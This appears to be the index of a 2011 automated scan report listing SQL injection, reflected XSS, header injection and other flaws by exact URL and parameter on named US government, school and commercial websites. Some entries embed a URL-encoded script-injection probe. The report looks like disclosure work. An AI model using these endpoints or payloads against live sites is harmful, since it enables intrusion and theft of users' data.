XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB Report 4-30-2011

Hoyt LLC Research investigates and reports on security vulnerabilities embedded in Web Applications and Products used in wide-scale deployment.

Report generated by XSS.CX at Sat Apr 30 17:35:25 CDT 2011.



1. SQL injection

1.1. https://assist.dhss.delaware.gov/PGM/ASP/SC020.asp [hdn_Language parameter]

1.2. http://pa.gov/portal/server.pt/gateway/PTARGS_0_2_24662_2966_368351_43/http [REST URL parameter 3]

1.3. http://pa.gov/portal/server.pt/gateway/PTARGS_0_2_24825_2966_368351_43/http [REST URL parameter 3]

1.4. http://pa.gov/portal/server.pt/gateway/PTARGS_0_2_24879_2966_368351_43/http [REST URL parameter 3]

1.5. http://www.alabama.gov/portal/index.jsp [User-Agent HTTP header]

1.6. http://www.budget.state.pa.us/portal/server.pt/gateway/PTARGS_0_2_38668_4566_458236_43/http [REST URL parameter 3]

1.7. http://www.budget.state.pa.us/portal/server.pt/gateway/PTARGS_0_2_39070_4566_458236_43/http [REST URL parameter 3]

1.8. http://www.vsea.org/join-your-union [name of an arbitrarily supplied request parameter]

1.9. http://www.vsea.org/sites/vsea.org/themes/unionproud2/favicon.ico [REST URL parameter 3]

1.10. http://www.vsea.org/sites/vsea.org/themes/unionproud2/splash_flash/slideShow.swf [REST URL parameter 3]

2. HTTP header injection

2.1. http://bs.serving-sys.com/BurstingPipe/adServer.bs [bwVal parameter]

2.2. http://bs.serving-sys.com/BurstingPipe/adServer.bs [flv parameter]

2.3. http://bs.serving-sys.com/BurstingPipe/adServer.bs [res parameter]

2.4. http://bs.serving-sys.com/BurstingPipe/adServer.bs [wmpv parameter]

2.5. http://wbtdcs.nara.gov/dcs5w0txb10000wocrvqy1nqm_6n1p/dcs.gif [REST URL parameter 1]

3. Cross-site scripting (reflected)

3.1. http://ads.adbrite.com/adserver/vdi/711384 [REST URL parameter 3]

3.2. http://agency.governmentjobs.com/tennessee/default.cfm [name of an arbitrarily supplied request parameter]

3.3. https://assist.dhss.delaware.gov/PGM/ASP/SC001.asp [hdn_SessionId parameter]

3.4. https://assist.dhss.delaware.gov/PGM/ASP/SC020.asp [hdn_Language parameter]

3.5. http://badge.dopiaza.org/flickr/badge.php [name of an arbitrarily supplied request parameter]

3.6. http://badge.dopiaza.org/flickr/badge.php [user parameter]

3.7. http://data.gosquared.com/info [a parameter]

3.8. http://data.ok.gov/api/rdfTerms.json [REST URL parameter 2]

3.9. http://data.ok.gov/api/views/35sq-wrr4/snapshots/page [REST URL parameter 2]

3.10. http://data.ok.gov/api/views/35sq-wrr4/snapshots/page [REST URL parameter 3]

3.11. http://data.ok.gov/api/views/35sq-wrr4/snapshots/page [REST URL parameter 4]

3.12. http://data.ok.gov/api/views/35sq-wrr4/snapshots/page [size parameter]

3.13. http://data.ok.gov/api/views/dz4w-xbzm/snapshots/page [REST URL parameter 2]

3.14. http://data.ok.gov/api/views/dz4w-xbzm/snapshots/page [REST URL parameter 3]

3.15. http://data.ok.gov/api/views/dz4w-xbzm/snapshots/page [REST URL parameter 4]

3.16. http://data.ok.gov/api/views/dz4w-xbzm/snapshots/page [size parameter]

3.17. http://data.ok.gov/api/views/xxvf-kunf/snapshots/page [REST URL parameter 2]

3.18. http://data.ok.gov/api/views/xxvf-kunf/snapshots/page [REST URL parameter 3]

3.19. http://data.ok.gov/api/views/xxvf-kunf/snapshots/page [REST URL parameter 4]

3.20. http://data.ok.gov/api/views/xxvf-kunf/snapshots/page [size parameter]

3.21. http://data.ok.gov/views.json [REST URL parameter 1]

3.22. http://data.ok.gov/views.json [tableId parameter]

3.23. http://data.ok.gov/views/INLINE/rows.json [REST URL parameter 1]

3.24. http://data.ok.gov/views/INLINE/rows.json [REST URL parameter 2]

3.25. http://data.ok.gov/views/INLINE/rows.json [REST URL parameter 3]

3.26. http://data.ok.gov/views/INLINE/rows.json [accessType parameter]

3.27. http://data.ok.gov/views/INLINE/rows.json [length parameter]

3.28. http://data.ok.gov/views/INLINE/rows.json [start parameter]

3.29. http://data.ok.gov/views/dz4w-xbzm.json [REST URL parameter 1]

3.30. http://data.ok.gov/views/dz4w-xbzm.json [REST URL parameter 2]

3.31. http://data.ok.gov/views/dz4w-xbzm.json [accessType parameter]

3.32. http://data.ok.gov/w/dz4w-xbzm/q69b-3vw6 [REST URL parameter 3]

3.33. http://digg.com/submit [REST URL parameter 1]

3.34. http://fonts.gawker.com/k/zvc4iwz-c-6179963-143.eot [REST URL parameter 1]

3.35. http://fonts.gawker.com/k/zvc4iwz-c-6179963-143.eot [REST URL parameter 2]

3.36. http://fonts.gawker.com/k/zvc4iwz-c-6179963-147.eot [REST URL parameter 1]

3.37. http://fonts.gawker.com/k/zvc4iwz-c-6179963-147.eot [REST URL parameter 2]

3.38. http://fonts.gawker.com/k/zvc4iwz-c.css [REST URL parameter 1]

3.39. http://fonts.gawker.com/k/zvc4iwz-c.css [REST URL parameter 2]

3.40. http://frwebgate.access.gpo.gov/cgi-bin/getdoc.cgi [name of an arbitrarily supplied request parameter]

3.41. http://image.providesupport.com/cmd/hic [REST URL parameter 1]

3.42. http://image.providesupport.com/js/hic/safe-standard.js [REST URL parameter 1]

3.43. http://image.providesupport.com/js/hic/safe-standard.js [REST URL parameter 2]

3.44. http://image.providesupport.com/js/hic/safe-standard.js [offline-image parameter]

3.45. http://image.providesupport.com/js/hic/safe-standard.js [offline-image parameter]

3.46. http://image.providesupport.com/js/hic/safe-standard.js [online-image parameter]

3.47. http://image.providesupport.com/js/hic/safe-textlink.js [REST URL parameter 1]

3.48. http://image.providesupport.com/js/hic/safe-textlink.js [REST URL parameter 2]

3.49. http://iot.custhelp.com/cgi-bin/iot.cfg/php/enduser/opensearch.php [callback parameter]

3.50. http://iot.custhelp.com/cgi-bin/iot.cfg/php/enduser/opensearch.php [name of an arbitrarily supplied request parameter]

3.51. http://iot.custhelp.com/cgi-bin/iot.cfg/php/enduser/opensearch.php [startIndex parameter]

3.52. http://jqueryui.com/themeroller/ [name of an arbitrarily supplied request parameter]

3.53. http://kodakimagingnetworki.tt.omtrdc.net/m2/kodakimagingnetworki/mbox/standard [mbox parameter]

3.54. http://landmark-project.com/feed2js/feed2js.php [src parameter]

3.55. http://newbrowse.livehelper.com/servlet/lhBrowse [REST URL parameter 2]

3.56. http://newbrowse.livehelper.com/servlet/lhBrowse [REST URL parameter 2]

3.57. http://newbrowse.livehelper.com/servlet/lhBrowse [REST URL parameter 2]

3.58. http://newbrowse.livehelper.com/servlet/lhBrowse [id parameter]

3.59. http://newchat.livehelper.com/servlet/lhChat [REST URL parameter 2]

3.60. http://newchat.livehelper.com/servlet/lhChat [id parameter]

3.61. http://nv.gov/workarea/csslib/ektronCss.ashx [id parameter]

3.62. http://nv.gov/workarea/java/ektronJs.ashx [id parameter]

3.63. https://olt.custhelp.com/cgi-bin/olt.cfg/php/enduser/acct_login.php [OLTSite parameter]

3.64. https://onestop.michigan.gov/OneStop/ssoNeedPassword.do [REST URL parameter 2]

3.65. https://onestop.michigan.gov/onestop-main/OneStop/css/a [REST URL parameter 4]

3.66. https://onestop.michigan.gov/onestop-main/OneStop/css/none [REST URL parameter 4]

3.67. https://onestop.michigan.gov/onestop-main/OneStop/ssoRegistration.do [REST URL parameter 3]

3.68. https://pixel.fetchback.com/serve/fb/pdc [name parameter]

3.69. http://serverapi.arcgisonline.com/jsapi/arcgis/ [v parameter]

3.70. http://sussex.de.schoolwebpages.com/education/school/school.php [REST URL parameter 1]

3.71. http://sussex.de.schoolwebpages.com/education/school/school.php [REST URL parameter 2]

3.72. http://sussex.de.schoolwebpages.com/education/school/school.php [REST URL parameter 3]

3.73. http://sussex.de.schoolwebpages.com/favicon.ico [REST URL parameter 1]

3.74. http://tomcat2.dot.state.ga.us/ContractsAdministration/index.cfm [REST URL parameter 1]

3.75. http://tomcat2.dot.state.ga.us/ContractsAdministration/index.cfm [REST URL parameter 2]

3.76. http://tomcat2.dot.state.ga.us/ContractsAdministration/index.cfm%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000010)%3C/script%3E [REST URL parameter 1]

3.77. http://tomcat2.dot.state.ga.us/ContractsAdministration/index.cfm%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000010)%3C/script%3E [REST URL parameter 2]

3.78. http://tomcat2.dot.state.ga.us/ContractsAdministration/index.cfm%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000010)%3C/script%3E [REST URL parameter 2]

3.79. http://tomcat2.dot.state.ga.us/ContractsAdministration/index.cfm%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000010)%3C/script%3E [REST URL parameter 3]

3.80. http://tomcat2.dot.state.ga.us/ContractsAdministration/index.cfm%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000010)%3C/script%3E [REST URL parameter 4]

3.81. http://tomcat2.dot.state.ga.us/ContractsAdministration/index.cfm%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000010)%3C/script%3E [REST URL parameter 4]

3.82. http://tomcat2.dot.state.ga.us/ContractsAdministration/index.cfm%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000010)%3C/script%3E [REST URL parameter 5]

3.83. http://tomcat2.dot.state.ga.us/ContractsAdministration/index.cfm%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000010)%3C/script%3E [REST URL parameter 5]

3.84. http://tomcat2.dot.state.ga.us/favicon.ico [REST URL parameter 1]

3.85. http://widgets.digg.com/buttons/count [url parameter]

3.86. http://www.addthis.com/bookmark.php [REST URL parameter 1]

3.87. http://www.addthis.com/bookmark.php [REST URL parameter 1]

3.88. http://www.addthis.com/bookmark.php [name of an arbitrarily supplied request parameter]

3.89. http://www.capehenlopenschools.com/education/district/district.php [REST URL parameter 1]

3.90. http://www.capehenlopenschools.com/education/district/district.php [REST URL parameter 2]

3.91. http://www.capehenlopenschools.com/education/district/district.php [REST URL parameter 3]

3.92. http://www.ct.gov/ctportal/cwp/view.asp [a parameter]

3.93. http://www.ct.gov/ctportal/cwp/view.asp [a parameter]

3.94. http://www.ct.gov/ctportal/site/default.asp [name of an arbitrarily supplied request parameter]

3.95. http://www.ct.gov/ctportal/taxonomy/taxonomy.asp [name of an arbitrarily supplied request parameter]

3.96. http://www.delmar.k12.de.us/education/district/district.php [REST URL parameter 1]

3.97. http://www.delmar.k12.de.us/education/district/district.php [REST URL parameter 2]

3.98. http://www.delmar.k12.de.us/education/district/district.php [REST URL parameter 3]

3.99. http://www.delmar.k12.de.us/favicon.ico [REST URL parameter 1]

3.100. http://www.georgia.gov/external/ [url parameter]

3.101. http://www.georgia.gov/external/ [url parameter]

3.102. http://www.georgia.gov/external/ [url parameter]

3.103. http://www.healthynh.com/index-fhc.php [name of an arbitrarily supplied request parameter]

3.104. http://www.kodakgallery.com/gallery/lp/2010/visit_florida/vacation_photos.jsp [name of an arbitrarily supplied request parameter]

3.105. http://www.ms.gov/ms_sub_template.jsp [Category_ID parameter]

3.106. http://www.nv.gov/workarea/csslib/ektronCss.ashx [id parameter]

3.107. http://www.nv.gov/workarea/java/ektronJs.ashx [id parameter]

3.108. http://www.nysegov.com/citGuide.cfm [content parameter]

3.109. http://www.nysegov.com/citGuide.cfm [superCat parameter]

3.110. https://www.scsignon.sc.gov/SCBOS.Core.Framework.Web.UI.Resources.aspx [Resource parameter]

3.111. http://www.sled.state.sc.us/sled/default.asp [name of an arbitrarily supplied request parameter]

3.112. http://www.state.mn.us/portal/mn/jsp/content.do [name of an arbitrarily supplied request parameter]

3.113. http://www.state.mn.us/portal/mn/jsp/contentprocess.do [name of an arbitrarily supplied request parameter]

3.114. http://www.state.mn.us/portal/mn/jsp/home.do [name of an arbitrarily supplied request parameter]

3.115. http://www.state.mn.us/portal/mn/jsp/hybrid.do [name of an arbitrarily supplied request parameter]

3.116. http://www.state.mn.us/portal/mn/jsp/logon.do [name of an arbitrarily supplied request parameter]

3.117. http://www.state.mn.us/portal/mn/jsp/redirectLink.do [name of an arbitrarily supplied request parameter]

3.118. http://www.state.mn.us/portal/mn/jsp/search.do [name of an arbitrarily supplied request parameter]

3.119. https://www.vermontjoblink.com/ada/leavesite.cfm [url parameter]

3.120. https://www.vermontjoblink.com/ada/mn_eligibility_dsp.cfm [rand parameter]

3.121. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [BLTEXTBOXEXTRADONOTUSE1_prev parameter]

3.122. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [CFTEXTBOXEXTRADONOTUSE_prev parameter]

3.123. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [ERRORFIELDS parameter]

3.124. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [FORMID_prev parameter]

3.125. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [FORMNAME_prev parameter]

3.126. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [FormID parameter]

3.127. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [FormName parameter]

3.128. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [FormName parameter]

3.129. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [OLD_CHOICE_prev parameter]

3.130. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [RAND_prev parameter]

3.131. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [SECURITYSYS_prev parameter]

3.132. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [U_name parameter]

3.133. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [bltextboxextradonotuse1 parameter]

3.134. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [bltextboxextradonotuse1 parameter]

3.135. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [cftextboxextradonotuse parameter]

3.136. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [cftextboxextradonotuse parameter]

3.137. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [choice parameter]

3.138. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [errorfields parameter]

3.139. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [formid parameter]

3.140. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [formid parameter]

3.141. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [formname parameter]

3.142. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [library_errormessage parameter]

3.143. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [library_errormessage parameter]

3.144. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [old_choice parameter]

3.145. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [old_choice parameter]

3.146. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [rand parameter]

3.147. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [rand parameter]

3.148. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [rand parameter]

3.149. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [securitysys parameter]

3.150. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [securitysys parameter]

3.151. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [submit parameter]

3.152. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [usvuserid parameter]

3.153. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [usvuserid_ADAdefault parameter]

3.154. https://www.vermontjoblink.com/ada/mn_quicksearch_dsp.cfm [type parameter]

3.155. https://www.vermontjoblink.com/ada/mn_registration_dsp.cfm [reg%5Ftype parameter]

3.156. https://www.vermontjoblink.com/ada/mn_warn_dsp.cfm [def parameter]

3.157. https://www.vermontjoblink.com/ada/services/schools/schsearch.cfm [FormID parameter]

3.158. https://www.vermontjoblink.com/ada/services/schools/schsearch.cfm [rand parameter]

3.159. https://www.vermontjoblink.com/ada/services/schools/schsearch.cfm [securitysys parameter]

3.160. http://www.visitflorida.com/facebook_logged_in.php [REST URL parameter 1]

3.161. http://www.visitflorida.com/facebook_logged_in.php [REST URL parameter 1]

3.162. http://www.visitflorida.com/florida_vacation_auction/auction_details.php [REST URL parameter 1]

3.163. http://www.visitflorida.com/florida_vacation_auction/auction_details.php [REST URL parameter 2]

3.164. http://www.visitflorida.com/floridalive [REST URL parameter 1]

3.165. http://www.visitflorida.com/floridalive [name of an arbitrarily supplied request parameter]

3.166. http://www.visitflorida.com/images/webcam.php [REST URL parameter 1]

3.167. http://www.visitflorida.com/images/webcam.php [REST URL parameter 2]

3.168. http://www.visitflorida.com/includes/js/footerSurvey.php [REST URL parameter 1]

3.169. http://www.visitflorida.com/includes/js/footerSurvey.php [REST URL parameter 2]

3.170. http://www.visitflorida.com/includes/js/footerSurvey.php [REST URL parameter 3]

3.171. http://www.workoneworks.com/ [name of an arbitrarily supplied request parameter]

3.172. http://www.workoneworks.com/favicon.ico [name of an arbitrarily supplied request parameter]

3.173. https://secure.missingkids.com/missingkids/servlet/CybertipServlet [Referer HTTP header]

3.174. http://www.addthis.com/bookmark.php [Referer HTTP header]

3.175. http://www.addthis.com/bookmark.php [Referer HTTP header]

3.176. http://www.addthis.com/bookmark.php [Referer HTTP header]

3.177. http://www.nist.gov/cgi-bin/exit_nist.cgi [Referer HTTP header]

3.178. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [Referer HTTP header]

3.179. http://image.providesupport.com/js/hic/safe-standard.js [vsid cookie]

3.180. http://image.providesupport.com/js/hic/safe-textlink.js [vsid cookie]

3.181. http://seg.sharethis.com/getSegment.php [__stid cookie]

3.182. http://view.atdmt.com/iaction/adoapn_AppNexusDemoActionTag_1 [AA002 cookie]

3.183. https://www.nrsservicecenter.com/iApp/ret/content/landing.do [MyNRSSite cookie]

3.184. https://www.nrsservicecenter.com/iApp/ret/landing.do [MyNRSSite cookie]

3.185. https://www.nrsservicecenter.com/iApp/ret/showPage.do [MyNRSSite cookie]

3.186. https://www.vermontjoblink.com/ada [SYSTRANLANGUAGE cookie]

3.187. https://www.vermontjoblink.com/ada [SYSTRANLANGUAGE cookie]

3.188. https://www.vermontjoblink.com/ada/404/404_qry.cfm [SYSTRANLANGUAGE cookie]

3.189. https://www.vermontjoblink.com/ada/404/404_qry.cfm [SYSTRANLANGUAGE cookie]

3.190. https://www.vermontjoblink.com/ada/customization/Vermont/documents/eeoislaw.cfm [SYSTRANLANGUAGE cookie]

3.191. https://www.vermontjoblink.com/ada/customization/Vermont/documents/eeoislaw.cfm [SYSTRANLANGUAGE cookie]

3.192. https://www.vermontjoblink.com/ada/customization/Vermont/documents/privacy.cfm [SYSTRANLANGUAGE cookie]

3.193. https://www.vermontjoblink.com/ada/customization/Vermont/documents/privacy.cfm [SYSTRANLANGUAGE cookie]

3.194. https://www.vermontjoblink.com/ada/customization/Vermont/favicon.ico [SYSTRANLANGUAGE cookie]

3.195. https://www.vermontjoblink.com/ada/customization/Vermont/favicon.ico [SYSTRANLANGUAGE cookie]

3.196. https://www.vermontjoblink.com/ada/default.cfm [SYSTRANLANGUAGE cookie]

3.197. https://www.vermontjoblink.com/ada/default.cfm [SYSTRANLANGUAGE cookie]

3.198. https://www.vermontjoblink.com/ada/etp/etp_newuser_dsp.cfm [SYSTRANLANGUAGE cookie]

3.199. https://www.vermontjoblink.com/ada/etp/etp_newuser_dsp.cfm [SYSTRANLANGUAGE cookie]

3.200. https://www.vermontjoblink.com/ada/leavesite.cfm [SYSTRANLANGUAGE cookie]

3.201. https://www.vermontjoblink.com/ada/leavesite.cfm [SYSTRANLANGUAGE cookie]

3.202. https://www.vermontjoblink.com/ada/mn_eligibility_dsp.cfm [SYSTRANLANGUAGE cookie]

3.203. https://www.vermontjoblink.com/ada/mn_eligibility_dsp.cfm [SYSTRANLANGUAGE cookie]

3.204. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [SYSTRANLANGUAGE cookie]

3.205. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [SYSTRANLANGUAGE cookie]

3.206. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [SYSTRANLANGUAGE cookie]

3.207. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [SYSTRANLANGUAGE cookie]

3.208. https://www.vermontjoblink.com/ada/mn_login_fnc.cfm [SYSTRANLANGUAGE cookie]

3.209. https://www.vermontjoblink.com/ada/mn_login_fnc.cfm [SYSTRANLANGUAGE cookie]

3.210. https://www.vermontjoblink.com/ada/mn_offices_dsp.cfm [SYSTRANLANGUAGE cookie]

3.211. https://www.vermontjoblink.com/ada/mn_offices_dsp.cfm [SYSTRANLANGUAGE cookie]

3.212. https://www.vermontjoblink.com/ada/mn_protectyourself_dsp.cfm [SYSTRANLANGUAGE cookie]

3.213. https://www.vermontjoblink.com/ada/mn_protectyourself_dsp.cfm [SYSTRANLANGUAGE cookie]

3.214. https://www.vermontjoblink.com/ada/mn_quicksearch_dsp.cfm [SYSTRANLANGUAGE cookie]

3.215. https://www.vermontjoblink.com/ada/mn_quicksearch_dsp.cfm [SYSTRANLANGUAGE cookie]

3.216. https://www.vermontjoblink.com/ada/mn_quicksearch_dsp.cfm [SYSTRANLANGUAGE cookie]

3.217. https://www.vermontjoblink.com/ada/mn_registration_dsp.cfm [SYSTRANLANGUAGE cookie]

3.218. https://www.vermontjoblink.com/ada/mn_registration_dsp.cfm [SYSTRANLANGUAGE cookie]

3.219. https://www.vermontjoblink.com/ada/mn_registration_dsp.cfm [SYSTRANLANGUAGE cookie]

3.220. https://www.vermontjoblink.com/ada/mn_registration_dsp.cfm [SYSTRANLANGUAGE cookie]

3.221. https://www.vermontjoblink.com/ada/mn_settings_dsp.cfm [SYSTRANLANGUAGE cookie]

3.222. https://www.vermontjoblink.com/ada/mn_settings_dsp.cfm [SYSTRANLANGUAGE cookie]

3.223. https://www.vermontjoblink.com/ada/mn_ssncheck.cfm [SYSTRANLANGUAGE cookie]

3.224. https://www.vermontjoblink.com/ada/mn_ssncheck.cfm [SYSTRANLANGUAGE cookie]

3.225. https://www.vermontjoblink.com/ada/mn_veterans_dsp.cfm [SYSTRANLANGUAGE cookie]

3.226. https://www.vermontjoblink.com/ada/mn_veterans_dsp.cfm [SYSTRANLANGUAGE cookie]

3.227. https://www.vermontjoblink.com/ada/mn_warn_dsp.cfm [SYSTRANLANGUAGE cookie]

3.228. https://www.vermontjoblink.com/ada/mn_warn_dsp.cfm [SYSTRANLANGUAGE cookie]

3.229. https://www.vermontjoblink.com/ada/mn_warn_dsp.cfm [SYSTRANLANGUAGE cookie]

3.230. https://www.vermontjoblink.com/ada/mn_warn_dsp.cfm [SYSTRANLANGUAGE cookie]

3.231. https://www.vermontjoblink.com/ada/services/schools/schsearch.cfm [SYSTRANLANGUAGE cookie]

3.232. https://www.vermontjoblink.com/ada/services/schools/schsearch.cfm [SYSTRANLANGUAGE cookie]

3.233. https://www.vermontjoblink.com/ada/works/FAQ.cfm [SYSTRANLANGUAGE cookie]

3.234. https://www.vermontjoblink.com/ada/works/FAQ.cfm [SYSTRANLANGUAGE cookie]

3.235. https://www.vermontjoblink.com/ada/works/Login.cfm [SYSTRANLANGUAGE cookie]

3.236. https://www.vermontjoblink.com/ada/works/Login.cfm [SYSTRANLANGUAGE cookie]

3.237. https://www.vermontjoblink.com/ada/works/contactus.cfm [SYSTRANLANGUAGE cookie]

3.238. https://www.vermontjoblink.com/ada/works/contactus.cfm [SYSTRANLANGUAGE cookie]

3.239. https://www.vermontjoblink.com/ada/works/employeroverview.cfm [SYSTRANLANGUAGE cookie]

3.240. https://www.vermontjoblink.com/ada/works/employeroverview.cfm [SYSTRANLANGUAGE cookie]

3.241. https://www.vermontjoblink.com/ada/works/joboverview.cfm [SYSTRANLANGUAGE cookie]

3.242. https://www.vermontjoblink.com/ada/works/joboverview.cfm [SYSTRANLANGUAGE cookie]

3.243. https://www.vermontjoblink.com/ada/works/jobsearch.cfm [SYSTRANLANGUAGE cookie]

3.244. https://www.vermontjoblink.com/ada/works/jobsearch.cfm [SYSTRANLANGUAGE cookie]

3.245. https://www.vermontjoblink.com/ada/works/linkview.cfm [SYSTRANLANGUAGE cookie]

3.246. https://www.vermontjoblink.com/ada/works/linkview.cfm [SYSTRANLANGUAGE cookie]

3.247. https://www.vermontjoblink.com/ada/works/resourcesoverview.cfm [SYSTRANLANGUAGE cookie]

3.248. https://www.vermontjoblink.com/ada/works/resourcesoverview.cfm [SYSTRANLANGUAGE cookie]

3.249. https://www.vermontjoblink.com/favicon.ico [SYSTRANLANGUAGE cookie]

3.250. https://www.vermontjoblink.com/favicon.ico [SYSTRANLANGUAGE cookie]

4. Flash cross-domain policy

5. Cleartext submission of password

5.1. http://data.ok.gov/Public-Safety-And-Defense/Oklahoma-Ignition-Interlock-Service-Centers-Map/dz4w-xbzm

5.2. http://data.ok.gov/Public-Safety-And-Defense/Oklahoma-Ignition-Interlock-Service-Centers-Map/dz4w-xbzm

5.3. http://digg.com/submit

5.4. http://myflorida.custhelp.com/cgi-bin/myflorida.cfg/php/enduser/acct_login.php

5.5. http://pa.gov/portal/server.pt

5.6. http://www.alabama.gov/portal/index.jsp

5.7. http://www.visitflorida.com/floridalive

5.8. http://www.vsea.org/

5.9. http://www.vsea.org/editorial-lays-out-vermont%26%23039

5.10. http://www.vsea.org/favicon.ico

5.11. http://www.vsea.org/join-vsea

5.12. http://www.vsea.org/join-your-union

5.13. http://www.vsea.org/maine-study-finds-state%26%23039

5.14. http://www.vsea.org/node

5.15. http://www.vsea.org/purchase-vsea-clothing

5.16. http://www.vsea.org/state-hospital%26%23039

6. XML injection

6.1. http://us.mcafee.com/root/basket.asp [Currency cookie]

6.2. http://us.mcafee.com/root/basket.asp [SiteID cookie]

6.3. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [usvuserid parameter]

7. SSL cookie without secure flag set

7.1. https://apps.tn.gov/bizreg/bizregprog

7.2. https://apps.tn.gov/bizreg/tax.jsp

7.3. https://apps.tn.gov/biztax-app/login.html

7.4. https://apps.tn.gov/paams-app/index.htm

7.5. https://apps.tn.gov/paams-app/recover/resetpassword.htm

7.6. https://apps.tn.gov/paams-app/recover/retrieveusermane.htm

7.7. https://assist.dhss.delaware.gov/PGM/ASP/SAACC.asp

7.8. https://assist.dhss.delaware.gov/PGM/ASP/SACOM.asp

7.9. https://assist.dhss.delaware.gov/PGM/ASP/SC001.asp

7.10. https://assist.dhss.delaware.gov/PGM/ASP/SC002.asp

7.11. https://assist.dhss.delaware.gov/PGM/ASP/SC020.asp

7.12. https://assist.dhss.delaware.gov/PGM/ASP/SC020.asp

7.13. https://assist.dhss.delaware.gov/PGM/ASP/SC024.asp

7.14. https://assist.dhss.delaware.gov/PGM/ASP/SC031.asp

7.15. https://dhr.ky.gov/DHRWeb/RS

7.16. https://dotax.ehawaii.gov/efile/user

7.17. https://egov.dnrec.delaware.gov/egovpublic/dnrec/disp

7.18. https://fin.oaks.ohio.gov/psp/FNPRD/

7.19. https://fortress.wa.gov/dol/dolprod/dsdoffices/

7.20. https://georgiawildlife.dnr.state.ga.us/service/login1.asp

7.21. https://hcm.oaks.ohio.gov/psp/HCPRD/

7.22. https://home.mcafee.com/ScriptResource.axd

7.23. https://home.mcafee.com/Secure/Protected/Login.aspx

7.24. https://home.mcafee.com/WebResource.axd

7.25. https://home.mcafee.com/WebServices/AccountWebSvc.asmx/js

7.26. https://home.mcafee.com/secure/cart

7.27. https://home.mcafee.com/secure/cart/

7.28. https://home.mcafee.com/secure/purchase/

7.29. https://iris.custhelp.com/

7.30. https://iris.custhelp.com/app/answers/detail/a_id/936/session/L3RpbWUvMTMwNDEyNDM1OS9zaWQvUlBRT3NLc2s%3D

7.31. https://iris.custhelp.com/app/home

7.32. https://joblink.alabama.gov/ada/works/WorkforceCenter.cfm

7.33. https://license.ohio.gov/lookup/default.asp

7.34. https://louisianadcpretire.gwrs.com/login.do

7.35. https://moversguide.usps.com/icoa/flow.do

7.36. https://nhlicenses.nh.gov/MyLicense%20Verification/Search.aspx

7.37. https://njmvcscheduling.state.nj.us/tc/driverlogin.do

7.38. https://onestop.michigan.gov/OneStop/ssoNeedPassword.do

7.39. https://onestop.michigan.gov/onestop-main/OneStop/ssoRegistration.do

7.40. https://portal.s4web.state.mn.us/psp/por91ssap/SELFSERVICE/ENTP/

7.41. https://portal.s4web.state.mn.us/psp/por91ssap/SELFSERVICE/ENTP/h/

7.42. https://portal.s4web.state.mn.us/psp/por91ssap/SELFSERVICE/ENTP/h/

7.43. https://portal.s4web.state.mn.us/psp/por91ssap_newwin/SELFSERVICE/ENTP/e/

7.44. https://portal01.state.nj.us/http:/portal20.sa.state.nj.us:8080/amserver/UI/Login

7.45. https://secure.apps.state.nd.us/dot/mv/mvrenewal/renewal.htm

7.46. https://secure.kentucky.gov/portal/login.aspx

7.47. https://secure.sces.org/PDIC/GatewayServlet

7.48. https://services.georgia.gov/dhr/cspp/do/public/Welcome

7.49. https://ssl.sc.gov/osmbareportfiling/precerttool.aspx

7.50. https://txapps.texas.gov/tolapp/txdl/welcome.dl

7.51. https://txapps.texas.gov/tolapp/viewandpay

7.52. https://unitedalert.com/

7.53. https://web.globalpay.com/taxpayer/default.asp

7.54. https://www.accesskansas.org/businesscenter/index.html

7.55. https://www.alabamainteractive.org/abc_license/

7.56. https://www.colorado.gov/apps/dps/mvvs/public/entry.jsf

7.57. https://www.humanservices.state.pa.us/Compass.Web/

7.58. https://www.humanservices.state.pa.us/idm/managedidmpub/ca12/index.jsp

7.59. https://www.myhealth.va.gov/mhv-portal-web/anonymous.portal

7.60. https://www.ncourt.com/forms/DE/navigation.aspx

7.61. https://www.nrsservicecenter.com/iApp/ret/cmd/RetLogin

